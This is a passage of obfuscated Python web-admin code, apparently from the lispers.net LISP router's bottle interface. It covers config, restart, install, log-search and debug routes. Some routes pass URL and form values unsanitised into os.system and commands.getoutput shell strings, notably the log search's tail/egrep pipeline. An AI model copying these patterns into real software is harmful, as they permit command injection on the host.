</tr>
<tr>
<td width="20%"><i>System Architecture:<br>
Number of CPUs:<font face="Courier New">{}{}</font></td>
<td width="80%"><font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>LISP Process Status:</i></td>
<td width="80%">
<div style="height: 100px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
<tr>
<td width="20%" valign="top"><i>System Resource Utilization:</i></td>
<td width="80%">
<div style="height: 200px; overflow: auto">
<font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>Release Notes:</i></td>
<td width="80%">
<div style="height: 300px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
</table>
''' . format ( i1ii1II1ii , lisp . lisp_version , Oo0o , O00 ,
OooO0oo , lisp . lisp_space ( 1 ) , O0ooooo0OOOO0 , o0o0oOoOO0O , IIiiI , iIiIIIIIii ,
O00oOo00o0o )
if 71 - 71: I1ii11iIi11i - ooOoO0o / OoOoOO00 * OoOoOO00 / i1IIi . i1IIi
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 53 - 53: I1Ii111
if 21 - 21: I11i
if 92 - 92: i11iIiiIii / I1Ii111 - iII111i % ooOoO0o * I1Ii111 + Oo0Ooo
if 11 - 11: OoooooooOO . I1Ii111
if 80 - 80: OoooooooOO - OOooOOo * Ii1I * I1ii11iIi11i / I1IiiI / OOooOOo
if 13 - 13: I1Ii111 * ooOoO0o + i11iIiiIii * I1Ii111 - ooOoO0o
if 23 - 23: iIii1I11I1II1 * i1IIi % OoooooooOO * IiII
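# URL /lisp/show/conf: return the running lisp.config file as plain text.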
@ bottle . route ( '/lisp/show/conf' )
def I1Iiiiiii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
return ( bottle . static_file ( "lisp.config" , root = "./" , mimetype = "text/plain" ) )
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
@ bottle . route ( '/lisp/show/diff' )
def oOOoOo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 89 - 89: II111iiii + i1IIi + II111iiii
return ( bottle . static_file ( "lisp.config.diff" , root = "./" ,
mimetype = "text/plain" ) )
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
if 42 - 42: OoOoOO00 * OoOoOO00 * I1Ii111 . I11i
if 51 - 51: OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o * iIii1I11I1II1 % OoO0O00
if 99 - 99: oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
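# URL /lisp/archive/conf: copy lisp.config to lisp.config.archive while
# holding the configuration IPC lock.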
@ bottle . route ( '/lisp/archive/conf' )
def OoO ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 35 - 35: OoOoOO00 + i11iIiiIii - II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
lisp . lisp_ipc_lock . acquire ( )
os . system ( "cp ./lisp.config ./lisp.config.archive" )
lisp . lisp_ipc_lock . release ( )
if 90 - 90: iII111i
i1I1ii = "Configuration file saved to "
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
i1I1ii += lisp . lisp_print_cour ( "./lisp.config.archive" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 31 - 31: OOooOOo + O0
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
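# URL /lisp/clear/conf: save a backup copy to lisp.config.before-clear and
# then clear the running configuration.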
@ bottle . route ( '/lisp/clear/conf' )
def I1iIiI11I1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 27 - 27: Ii1I . i11iIiiIii % I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
os . system ( "cp ./lisp.config ./lisp.config.before-clear" )
lisp . lisp_ipc_lock . acquire ( )
iI11I ( )
lisp . lisp_ipc_lock . release ( )
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
i1I1ii = "Configuration cleared, a backup copy is stored in "
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
i1I1ii += lisp . lisp_print_cour ( "./lisp.config.before-clear" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
if 61 - 61: I11i % ooOoO0o - OoO0O00 / Oo0Ooo
if 4 - 4: OoooooooOO - i1IIi % Ii1I - OOooOOo * o0oOOo0O0Ooo
if 85 - 85: OoooooooOO * iIii1I11I1II1 . iII111i / OoooooooOO % I1IiiI % O0
if 36 - 36: Ii1I / II111iiii / IiII / IiII + I1ii11iIi11i
if 95 - 95: IiII
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
@ bottle . route ( '/lisp/clear/conf/verify' )
def OOoOoo0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 17 - 17: Ii1I + oO0o . OoO0O00 - Oo0Ooo * i11iIiiIii
if 20 - 20: I1IiiI . OoooooooOO % OOooOOo
i1I1ii = "<br>Are you sure you want to clear the configuration?"
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
if 63 - 63: I1IiiI % iIii1I11I1II1
I1ii = lisp . lisp_button ( "yes" , "/lisp/clear/conf" )
O00O0O = lisp . lisp_button ( "cancel" , "/lisp" )
i1I1ii += I1ii + O00O0O + "<br>"
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 19 - 19: OoO0O00 * I11i / I11i . OoooooooOO - OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if 30 - 30: OoOoOO00
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if 10 - 10: II111iiii . iII111i
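# Return the port argument (443, -8080, or 8080) that the running
# lisp-core.pyo process was started with, by scanning "ps auxww" output.
# Returns "" if no matching process is found.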
def I1iOOOO ( ) :
oOoO0o00OO0 = ""
if 88 - 88: iII111i
for iiI11I1i1i1iI in [ "443" , "-8080" , "8080" ] :
OoOOo000o0 = 'ps auxww | egrep "lisp-core.pyo {}" | egrep -v grep' . format ( iiI11I1i1i1iI )
i1I1ii = commands . getoutput ( OoOOo000o0 )
if ( i1I1ii == "" ) : continue
if 12 - 12: II111iiii . I11i / OOooOOo
i1I1ii = i1I1ii . split ( "\n" ) [ 0 ]
i1I1ii = i1I1ii . split ( " " )
if ( i1I1ii [ - 2 ] == "lisp-core.pyo" and i1I1ii [ - 1 ] == iiI11I1i1i1iI ) : oOoO0o00OO0 = iiI11I1i1i1iI
break
if 77 - 77: ooOoO0o - I1IiiI % I11i - O0
return ( oOoO0o00OO0 )
if 67 - 67: OOooOOo + Oo0Ooo
if 84 - 84: O0 * OoooooooOO - IiII * IiII
if 8 - 8: ooOoO0o / i1IIi . oO0o
if 41 - 41: iII111i + OoO0O00
if 86 - 86: OoOoOO00 . iIii1I11I1II1 - OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
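# URL /lisp/restart: restart the LISP subsystem. Refuses if /etc/sudoers
# still contains "Defaults requiretty"; otherwise runs
# "sudo ./RESTART-LISP <port>" in a background thread and returns at once.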
@ bottle . route ( '/lisp/restart' )
def iIII1i1i ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 35 - 35: II111iiii * I11i - OoooooooOO . I11i . I11i
if 11 - 11: I1Ii111 / OoOoOO00 + I11i % iIii1I11I1II1
if 42 - 42: I1ii11iIi11i * OoOoOO00 % ooOoO0o - OoOoOO00 . i11iIiiIii - I1Ii111
if 84 - 84: I1Ii111 - I1ii11iIi11i / I11i
if 13 - 13: IiII - Oo0Ooo - ooOoO0o
if 92 - 92: ooOoO0o / OoOoOO00 * OoO0O00 . I11i % II111iiii
OooOO = commands . getoutput ( "egrep requiretty /etc/sudoers" ) . split ( " " )
if ( OooOO [ - 1 ] == "requiretty" and OooOO [ 0 ] == "Defaults" ) :
i1I1ii = "Need to remove 'requiretty' from /etc/sudoers"
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 71 - 71: I1Ii111 % i1IIi - II111iiii - OOooOOo + OOooOOo * ooOoO0o
if 51 - 51: iIii1I11I1II1 / OoOoOO00 + OOooOOo - I11i + iII111i
lisp . lprint ( lisp . bold ( "LISP subsystem restart request received" , False ) )
if 29 - 29: o0oOOo0O0Ooo % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / iII111i
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
if 76 - 76: Ii1I - II111iiii * OOooOOo / OoooooooOO
oOoO0o00OO0 = I1iOOOO ( )
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
if 71 - 71: OoooooooOO
if 33 - 33: I1Ii111
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
OoOOo000o0 = "sleep 1; sudo ./RESTART-LISP {}" . format ( oOoO0o00OO0 )
thread . start_new_thread ( os . system , ( OoOOo000o0 , ) )
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
i1I1ii = lisp . lisp_print_sans ( "Restarting LISP subsystem ..." )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if 45 - 45: IiII
if 20 - 20: OoooooooOO * o0oOOo0O0Ooo * O0 . OOooOOo
if 78 - 78: iIii1I11I1II1 + I11i - Ii1I * I1Ii111 - OoooooooOO % OoOoOO00
if 34 - 34: O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
@ bottle . route ( '/lisp/restart/verify' )
def OO0O0o0o0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 31 - 31: Ii1I
if 44 - 44: OoOoOO00 - iIii1I11I1II1 - Oo0Ooo
i1I1ii = "<br>Are you sure you want to restart the LISP subsystem?"
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
if 80 - 80: iIii1I11I1II1 * I1Ii111 % I11i % Oo0Ooo
I1ii = lisp . lisp_button ( "yes" , "/lisp/restart" )
O00O0O = lisp . lisp_button ( "cancel" , "/lisp" )
i1I1ii += I1ii + O00O0O + "<br>"
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 95 - 95: iIii1I11I1II1 - I1ii11iIi11i . I1Ii111 - I1IiiI
if 75 - 75: OoO0O00 + o0oOOo0O0Ooo - i1IIi . OoooooooOO * Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
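# URL /lisp/install (POST): download and install a lispers.net release
# tarball. The URL must contain "lispers.net" and ".tgz"; the download is
# done with lisp-get-bits.pyo, the result is reported, and on success a
# button is offered to restart the subsystem.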
@ bottle . route ( '/lisp/install' , method = "post" )
def iiIII1II ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 100 - 100: Oo0Ooo % Ii1I / I11i
if 30 - 30: Oo0Ooo - OOooOOo - iII111i
OOO = bottle . request . forms . get ( "image_url" )
if ( OOO . find ( "lispers.net" ) == - 1 or OOO . find ( ".tgz" ) == - 1 ) :
I11IIiIiI = "Invalid install request for file {}" . format ( OOO )
lisp . lprint ( lisp . bold ( I11IIiIiI , False ) )
i1I1ii = lisp . lisp_print_sans ( "Invalid lispers.net tarball file name" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if ( lisp . lisp_is_ubuntu ( ) ) :
OoOOo000o0 = "python lisp-get-bits.pyo {} force 2>&1 > /dev/null" . format ( OOO )
else :
OoOOo000o0 = "python lisp-get-bits.pyo {} force >& /dev/null" . format ( OOO )
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
IIiiI = os . system ( OoOOo000o0 )
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
OoooO0o = OOO . split ( "/" ) [ - 1 ]
if 24 - 24: OoOoOO00 % i1IIi + iII111i . i11iIiiIii . I1ii11iIi11i
if ( os . path . exists ( OoooO0o ) ) :
IIi1II = OOO . split ( "release-" ) [ 1 ]
IIi1II = IIi1II . split ( ".tgz" ) [ 0 ]
if 2 - 2: II111iiii - OoO0O00 . IiII * iII111i / oO0o
i1I1ii = "Install completed for release {}" . format ( IIi1II )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
if 80 - 80: OOooOOo / I11i / OoOoOO00 + i1IIi - Oo0Ooo
i1I1ii += "<br><br>" + lisp . lisp_button ( "restart LISP subsystem" ,
"/lisp/restart/verify" ) + "<br>"
else :
I11IIiIiI = lisp . lisp_print_cour ( OOO )
i1I1ii = "Install failed for file {}" . format ( I11IIiIiI )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
if 11 - 11: o0oOOo0O0Ooo * OoO0O00
if 15 - 15: OoOoOO00
I11IIiIiI = "Install request for file {} {}" . format ( OOO ,
"succeeded" if ( IIiiI == 0 ) else "failed" )
lisp . lprint ( lisp . bold ( I11IIiIiI , False ) )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 62 - 62: Ii1I
if 51 - 51: OoOoOO00
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if 53 - 53: Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if 12 - 12: OOooOOo
@ bottle . route ( '/lisp/install/image' )
def ooOo0O ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 37 - 37: Ii1I % OoO0O00
if 79 - 79: I1ii11iIi11i + I1IiiI / I1IiiI
I11IIiIiI = lisp . lisp_print_sans ( "<br>Enter lispers.net tarball URL:" )
i1I1ii = '''
<form action="/lisp/install" method="post" style="display: inline;">
{}
<input type="text" name="image_url" size="75" required/>
<input type="submit" style="background-color:transparent;border-radius:10px;" value="Submit" />
</form><br>''' . format ( I11IIiIiI )
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
if 1 - 1: ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
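# URL /lisp/log/flows: touch ./log-flows, which signals the LISP processes
# to append current flow data to the flow log shown in the returned link.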
@ bottle . route ( '/lisp/log/flows' )
def oo0OoOooo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 95 - 95: IiII * I1ii11iIi11i % ooOoO0o % Ii1I - Ii1I
if 97 - 97: I1ii11iIi11i + iIii1I11I1II1 . O0
os . system ( "touch ./log-flows" )
if 64 - 64: i1IIi % ooOoO0o / i11iIiiIii - i1IIi % OOooOOo . iII111i
i1I1ii = lisp . lisp_print_sans ( "Flow data appended to file " )
II1i111 = "<a href='/lisp/show/log/lisp-flow/100'>logs/lisp-flows.log</a>"
i1I1ii += lisp . lisp_print_cour ( II1i111 )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
if 62 - 62: i1IIi + Oo0Ooo % IiII
if 28 - 28: I1ii11iIi11i . i1IIi
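# URL /lisp/search/log/<name>/<num>/<keyword>: grep the last <num> lines of
# logs/<name>.log for <keyword> with 10 lines of context on each side,
# report the number of occurrences, and highlight the keyword in the output.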
@ bottle . route ( '/lisp/search/log/<name>/<num>/<keyword>' )
def iIIi ( name = "" , num = "" , keyword = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 96 - 96: iII111i
if 18 - 18: iII111i * I11i - Ii1I
OOoOO0o0o0 = "tail -n {} logs/{}.log | egrep -B10 -A10 {}" . format ( num , name ,
keyword )
i1I1ii = commands . getoutput ( OOoOO0o0o0 )
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if ( i1I1ii ) :
iI1iii = i1I1ii . count ( keyword )
i1I1ii = lisp . convert_font ( i1I1ii )
i1I1ii = i1I1ii . replace ( "--\n--\n" , "--\n" )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
i1I1ii = i1I1ii . replace ( "--<br>" , "<hr>" )
i1I1ii = "Found <b>{}</b> occurences<hr>" . format ( iI1iii ) + i1I1ii
else :
i1I1ii = "Keyword {} not found" . format ( keyword )
if 87 - 87: I1ii11iIi11i / OoooooooOO - Oo0Ooo % OoOoOO00 % IiII % Oo0Ooo
if 29 - 29: OoooooooOO . I1IiiI % I1ii11iIi11i - iII111i
if 8 - 8: i1IIi
if 32 - 32: oO0o / II111iiii
if 45 - 45: I1ii11iIi11i + OoO0O00 * i11iIiiIii / OOooOOo % I11i * O0
i1o0oooO = "<font color='blue'><b>{}</b>" . format ( keyword )
i1I1ii = i1I1ii . replace ( keyword , i1o0oooO )
i1I1ii = i1I1ii . replace ( keyword , keyword + "</font>" )
if 89 - 89: II111iiii / oO0o
i1I1ii = lisp . lisp_print_cour ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if 19 - 19: i11iIiiIii
@ bottle . post ( '/lisp/search/log/<name>/<num>' )
def oo0oOO ( name = "" , num = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 32 - 32: OoOoOO00 * I1IiiI % ooOoO0o * Ii1I . O0
if 48 - 48: iII111i * iII111i
I1I1 = bottle . request . forms . get ( "keyword" )
return ( iIIi ( name , num , I1I1 ) )
if 4 - 4: o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
if 63 - 63: oO0o
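# URL /lisp/show/log/<name>/<num>: show the last <num> lines (default 100)
# of logs/<name>.log with a keyword-search form at the top.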
@ bottle . route ( '/lisp/show/log/<name>/<num>' )
def Oo0 ( name = "" , num = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 79 - 79: OoO0O00 % OOooOOo / iIii1I11I1II1 + OoOoOO00 * OoO0O00
if 30 - 30: OoooooooOO / I11i + iII111i / I1ii11iIi11i * O0
if 16 - 16: Oo0Ooo / i11iIiiIii
if 64 - 64: i11iIiiIii / Ii1I * i1IIi
if 73 - 73: Oo0Ooo - OoOoOO00 - oO0o - I1IiiI
if ( num == "" ) : num = 100
if 65 - 65: o0oOOo0O0Ooo
I1ii1II1iII = '''
<form action="/lisp/search/log/{}/{}" method="post">
<i>Keyword search:</i>
<input type="text" name="keyword" />
<input style="background-color:transparent;border-radius:10px;" type="submit" value="Submit" />
</form><hr>
''' . format ( name , num )
if 8 - 8: OoOoOO00 / O0 * O0 % I1Ii111 - Oo0Ooo + I11i
if ( os . path . exists ( "logs/{}.log" . format ( name ) ) ) :
i1I1ii = commands . getoutput ( "tail -n {} logs/{}.log" . format ( num , name ) )
i1I1ii = lisp . convert_font ( i1I1ii )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
i1I1ii = I1ii1II1iII + lisp . lisp_print_cour ( i1I1ii )
else :
oo = lisp . lisp_print_sans ( "File" )
Ii1IiIiIi1IiI = lisp . lisp_print_cour ( "logs/{}.log" . format ( name ) )
i1iiIIi1I = lisp . lisp_print_sans ( "does not exist" )
i1I1ii = "{} {} {}" . format ( oo , Ii1IiIiIi1IiI , i1iiIIi1I )
if 36 - 36: I1IiiI * Oo0Ooo
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 77 - 77: oO0o % i1IIi - Ii1I
if 93 - 93: OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
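# URL /lisp/debug/<name>: turn individual debug options on or off through
# the configuration API. <name> is "option%value"; the special value
# "disable%all" resets every "lisp debug" option and the
# data-plane-logging/flow-logging xtr-parameters to "no".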
@ bottle . route ( '/lisp/debug/<name>' )
def ooOoO ( name = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
if 14 - 14: I1ii11iIi11i
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if ( name == "disable%all" ) :
IIIi1i1I = lispconfig . lisp_get_clause_for_api ( "lisp debug" )
if ( IIIi1i1I [ 0 ] . has_key ( "lisp debug" ) ) :
OoO0OOOOo0O = [ ]
for I1i1I in IIIi1i1I [ 0 ] [ "lisp debug" ] :
iii1I1Iii = I1i1I . keys ( ) [ 0 ]
OoO0OOOOo0O . append ( { iii1I1Iii : "no" } )
if 82 - 82: Ii1I + IiII
OoO0OOOOo0O = { "lisp debug" : OoO0OOOOo0O }
lispconfig . lisp_put_clause_for_api ( OoO0OOOOo0O )
if 12 - 12: I1Ii111
if 93 - 93: i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / o0oOOo0O0Ooo / II111iiii
IIIi1i1I = lispconfig . lisp_get_clause_for_api ( "lisp xtr-parameters" )
if ( IIIi1i1I [ 0 ] . has_key ( "lisp xtr-parameters" ) ) :
OoO0OOOOo0O = [ ]
for I1i1I in IIIi1i1I [ 0 ] [ "lisp xtr-parameters" ] :
iii1I1Iii = I1i1I . keys ( ) [ 0 ]
if ( iii1I1Iii in [ "data-plane-logging" , "flow-logging" ] ) :
OoO0OOOOo0O . append ( { iii1I1Iii : "no" } )
else :
OoO0OOOOo0O . append ( { iii1I1Iii : I1i1I [ iii1I1Iii ] } )
if 49 - 49: OOooOOo . I1ii11iIi11i . i11iIiiIii - II111iiii / Ii1I
if 62 - 62: OOooOOo
OoO0OOOOo0O = { "lisp xtr-parameters" : OoO0OOOOo0O }
lispconfig . lisp_put_clause_for_api ( OoO0OOOOo0O )
if 1 - 1: IiII / IiII - i11iIiiIii
if 87 - 87: Oo0Ooo / O0 * IiII / o0oOOo0O0Ooo
return ( lispconfig . lisp_landing_page ( ) )
if 19 - 19: I1Ii111 + i1IIi . I1IiiI - Oo0Ooo
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
name = name . split ( "%" )
Ii11iI1ii1111 = name [ 0 ]
Iii111II = name [ 1 ]
if 42 - 42: I1Ii111 + I1Ii111 * II111iiii
o0Oo = [ "data-plane-logging" , "flow-logging" ]
if 57 - 57: OOooOOo / Oo0Ooo
oO0O0Ooo = "lisp xtr-parameters" if ( Ii11iI1ii1111 in o0Oo ) else "lisp debug"
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
IIIi1i1I = lispconfig . lisp_get_clause_for_api ( oO0O0Ooo )
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
if ( IIIi1i1I [ 0 ] . has_key ( oO0O0Ooo ) ) :
OoO0OOOOo0O = { }
for I1i1I in IIIi1i1I [ 0 ] [ oO0O0Ooo ] :
OoO0OOOOo0O [ I1i1I . keys ( ) [ 0 ] ] = I1i1I . values ( ) [ 0 ]
if ( OoO0OOOOo0O . has_key ( Ii11iI1ii1111 ) ) : OoO0OOOOo0O [ Ii11iI1ii1111 ] = Iii111II
if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
OoO0OOOOo0O = { oO0O0Ooo : OoO0OOOOo0O }
lispconfig . lisp_put_clause_for_api ( OoO0OOOOo0O )
if 52 - 52: II111iiii . I1IiiI + OoOoOO00 % OoO0O00
return ( lispconfig . lisp_landing_page ( ) )
if 62 - 62: o0oOOo0O0Ooo
if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
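# URL /lisp/clear/...: clear the referral-cache, ITR/RTR map-cache, or
# per-EID decapsulation stats by sending a "clear" command over IPC to the
# owning LISP process. Requires superuser privileges. If static map-cache
# entries are configured, lisp.config is touched so they are reloaded.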
@ bottle . route ( '/lisp/clear/<name>' )
@ bottle . route ( '/lisp/clear/etr/<etr_name>/<stats_name>' )
@ bottle . route ( '/lisp/clear/rtr/<rtr_name>/<stats_name>' )
@ bottle . route ( '/lisp/clear/itr/<itr_name>' )
@ bottle . route ( '/lisp/clear/rtr/<rtr_name>' )
def ooooOoO0O ( name = "" , itr_name = '' , rtr_name = "" , etr_name = "" ,
stats_name = "" ) :
if 1 - 1: I1ii11iIi11i / OoO0O00 + oO0o . o0oOOo0O0Ooo / I1ii11iIi11i - iII111i
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 5 - 5: OOooOOo
if 4 - 4: iII111i % I1Ii111 / OoO0O00 . OOooOOo / OOooOOo - I1ii11iIi11i
if 79 - 79: I1ii11iIi11i + I1Ii111
if 10 - 10: Oo0Ooo + O0
if 43 - 43: iIii1I11I1II1 / II111iiii % o0oOOo0O0Ooo - OOooOOo
if ( lispconfig . lisp_is_user_superuser ( None ) == False ) :
i1I1ii = lisp . lisp_print_sans ( "Not authorized" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 62 - 62: I11i
if 63 - 63: OOooOOo + ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
